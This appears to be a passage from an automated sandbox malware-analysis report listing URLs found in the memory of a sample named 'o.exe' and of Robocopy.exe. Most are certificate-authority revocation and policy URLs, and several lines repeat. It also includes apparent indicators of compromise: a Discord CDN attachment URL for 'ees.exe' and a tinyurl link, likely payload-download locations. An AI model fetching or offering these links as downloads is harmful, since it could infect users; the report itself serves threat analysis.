Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp, o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.1
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: o.exe, 00000010.00000002.2141296727.000000001D137000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393171507/778732067705454592/ees.exe
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393?
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393x
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com
Source: o.exe, 00000010.00000002.2137406124.000000000351E000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y3m5fwhq
Source: o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: o.exe, 00000010.00000003.2131439374.000000001D153000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: o.exe, 00000010.00000003.2131439374.000000001D153000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: o.exe, 00000010.00000002.2141296727.000000001D137000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o.exe, 00000010.00000002.2141086169.000000001D0C7000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: o.exe, 00000010.00000002.2141397608.000000001D155000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0r
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%
Source: o.exe, 00000010.00000002.2132356801.000000000034B000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp, o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp, o.exe, 00000010.00000003.2129295825.000000001D0EF000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: Robocopy.exe, 00000007.00000002.2110204380.0000000002A40000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2133317799.0000000002530000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: o.exe, 00000010.00000002.2141573754.000000001D2B0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: Robocopy.exe, 00000007.00000002.2110204380.0000000002A40000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2133317799.0000000002530000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.a-cert.at0E
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.crc.bg0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: o.exe, 00000010.00000002.2141122352.000000001D0D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: o.exe, 00000010.00000002.2141086169.000000001D0C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp, o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.1
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: o.exe, 00000010.00000002.2141296727.000000001D137000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393
Source: o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/770629131393171507/778732067705454592/ees.exe
